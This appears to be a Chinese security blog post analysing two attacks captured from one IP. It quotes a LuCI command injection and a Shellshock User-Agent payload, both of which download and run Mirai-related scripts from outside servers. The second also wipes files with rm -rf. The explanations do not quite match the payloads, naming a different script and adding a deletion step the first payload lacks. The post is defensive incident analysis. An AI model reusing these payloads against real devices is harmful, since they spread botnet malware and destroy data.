熊二
发布于 IP属地四川省

一次简单事件分析

一次简单事件分析

A、前言:

这是之前的一次事件截图,一登陆上安全设备就看见荷兰的这个185.191.126.213攻击IP一直在进行攻击行为。

B、第一种攻击行为分析:

案例A:
1、通过构造特定的接口再执行wget下载木马从而执行特定的命令;

https://域名或IP/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>\`wget http://103.149.86.202/t -O- | sh\`)

2、操作解释:(如果执行成功后)

a、rm -rf :                                        删除服务器当前目录下的所有文件和子目录;
b、/cgi-bin/luci/;stok=/locale:                    LuC界面中CGI脚本的路径;
c、?form=country&operation=write&country=:         是传递给CGI脚本的参数;
d、$(id>\`wget http://103.149.86.202/t -O- | sh\`):从这个地址下载一个脚本,并直接通过sh执行它,执行id命令;

3、微步/奇安信威胁情报平台:查询验证:可以看见相关的样本



4、从进程这里也可以发现一些:主要就是下载文件然后给权限再删除其它文件这种

C、第二种攻击行为分析:

1、示例:
利用URL路径或者查询参数注入Shell命令,在目标系统上执行删除操作并下载并执行远程恶意脚本;

https://域名或IP/cgi-bin/jarrewrite.sh 

User-Agent: () { :; }; echo ; /bin/bash -c 'rm -rf \*; cd /tmp; wget http://45.142.214.108/nigga.sh; chmod 777 nigga.sh; ./nigga.sh' Connection: close SL-CE-SUID: 25

2、操作解释:(如果执行成功后)

1. rm -rf *:删除当前目录下的所有文件 ;

2. wget http://45.142.214.108/tenda.sh:从攻击者控制的服务器下载名为tenda.sh 的脚本;

3. chmod 777 tenda.sh:给下载的脚本赋予所有用户可执行权限 ;

4. ./tenda.sh:执行该脚本;

5. -H 'User-Agent: ...':模拟浏览器标识以欺骗服务器,使其认为请求来自特定版本的浏览器;

6. -H 'Connection: keep-alive':设置保持连接状态,以便复用TCP连接发送多个请求;

7. -H 'SL-CE-SUID: 25':添加自定义请求头,其含义取决于服务器的具体实现和可能存在的漏洞;


简单朔源一下:
1、用其它设备访问这个服务器下载文件,有安全软件的话会被提示有威胁的

2、代码如下:

3、IP查询:
第一个案例A的服务器IP物理位置:

第二个案例A服务器IP物理位置:

小总结(简单):

微步在线、奇安信威胁情报中心检测结果显示该文件为一个恶意软件样本,该样本被多个反病毒引擎识别为不同变种的Mirai或与其相关的Linux僵尸网络木马;
Mirai是一种臭名昭著的物联网(IoT)恶意软件,主要针对安全性较弱的物联网设备,如路由器、摄像头等,将其感染并纳入僵尸网络中,用于发动大规模DDoS攻击。大多数安全软件厂商均将此样本识别为Mirai家族的一员;
个人判断“103.149.86.202”这应该是攻击者的一个木马库,上面挺多恶意脚本这些。

浏览 (365)
点赞 (4)
收藏
打赏
评论